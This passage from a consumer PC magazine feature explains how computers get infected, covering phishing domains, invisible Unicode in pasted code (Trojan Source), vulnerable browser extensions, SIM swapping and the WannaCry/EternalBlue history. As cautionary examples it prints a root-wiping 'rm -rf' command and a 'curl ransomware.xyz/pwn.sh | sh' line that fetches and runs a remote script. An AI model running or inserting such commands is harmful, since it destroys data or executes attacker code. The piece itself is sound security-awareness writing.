© CRXCAVATOR.IO
>> We hope you’re not the sort of person who clicks random
links in suspect-looking emails, but at the very least, you should
hover over them (or copy and paste the link into a text document)
to make sure it links to a legitimate domain (and not something
using deceptive characters like goog1e.com, or deceptive
subdomains like google.domain.cm). Speaking of copying and
pasting, be extra careful when doing so with code excerpts. Not
only is there the risk the command itself will do something bad,
like rm -rf –no-root-preserve/, but thanks to the wonders of CSS
and Unicode it’s easy to inject invisible characters that you won’t
see until they’re pasted (and conceivably not even then). Just
appending curl ransomware.xyz/pwn.sh | sh is one way to stop
a benign command from being so benign (not a real URL, by the
way). Bidirectional (Bidi) character encodings have been used to
obfuscate file extensions of email-borne malware in the past.
>> A more insidious form of this attack has now been discovered,
dubbed Trojan Source. It turns out that most compilers, while
fully supporting and encouraging Unicode source files, don’t
really have any mitigations against obfuscated Bidi additions. So
a lazy developer might copy and paste a code snippet from Stack
Overflow, then not only risk having their own compiler exploited,
but if they then upload that code to a popular project, the whole
well becomes poisoned.
>> You can read about it in-depth at https://krebsonsecurity.
com/2021/11/trojan-source-bug-threatens-the-security-of-all-
code/ (don’t worry, that link is safe!) The scope of the attack is
huge, because it allows essentially arbitrary, invisible code to be
added. This might be keyloggers, ransomware, or any number of
other bad things. >> No matter how web-savvy you are, you can always
take steps to further your browsing security. No one likes
ads and no one likes that the networks behind them are,
on occasion, compromised to instead spew malicious
JavaScript. The most popular ad-blocker for Firefox is
uBlock Origin and we wouldn’t hesitate to recommend
it. There are several other add-ons you might want to
use to protect privacy. But be aware that the Firefox add-
ons repository and Chrome Web Store are not actively
monitored for malicious code. So exercise an abundance
of caution when downloading new add-ons.
>> Even genuine add-ons contain code that can be
exploited by a rogue add-on or a maliciously crafted web
page. A study entitled “DoubleX: Statically Detecting
Vulnerable Data Flows in Browser Extensions at Scale,”
found 184 extensions that could be exploited this way. An
unchecked ‘eval’ function in a privileged extension might
allow a web page to do anything the extension can. A stray
tabs.execute() call would allow remote code inclusion.>> The Trojan Source attack has a spooky website
(https://trojansource.codes) that carries the rather
ominous tagline “Some vulnerabilites are invisible”.>> If you need a second opinion on Chrome extensions,
you could do a lot worse than visiting https://crxcavator.io.Unfortunately, most ransomware outbreaks start with
human error. This might be through social engineering,
spear-phishing campaigns (where high profile individuals
are targeted and tricked into handing over data with
seemingly legitimate messages), rogue browser add-
ons, dodgy websites, dodgy mobile apps, poisoned email
attachments, the list goes on.
Sometimes human error upstream is to blame, for
example, SIM-swapping attacks might involve tricking a
customer service agent into porting a number to another
SIM. This might then enable 2FA to be compromised on all
the accounts linked to that number. Whatever the method,
once a human has erred, access is granted.
The WannaCry outbreak in 2017, which nearly crippled
the UK’s largely Windows 7-powered National Health
Service, was a little different since its spread was mostly
as a result of a vulnerability in the SMB protocol. That
vulnerability was actually known to NSA researchers, who
named it EternalBlue. Unfortunately, someone (perhaps a
rogue contractor) made away with its details. And later, just
before WannaCry hit, the vulnerability was published by a
group calling themselves the ShadowBrokers.
EternalBlue, which allows privileged code execution
on remote systems, was also leveraged in the NotPetya
ransomware outbreak, which disrupted global shipping
more than the Ever Given blocking the Suez Canal did.HOW TO GET INFECTED
MAR 2022 MAXIMU MPC 67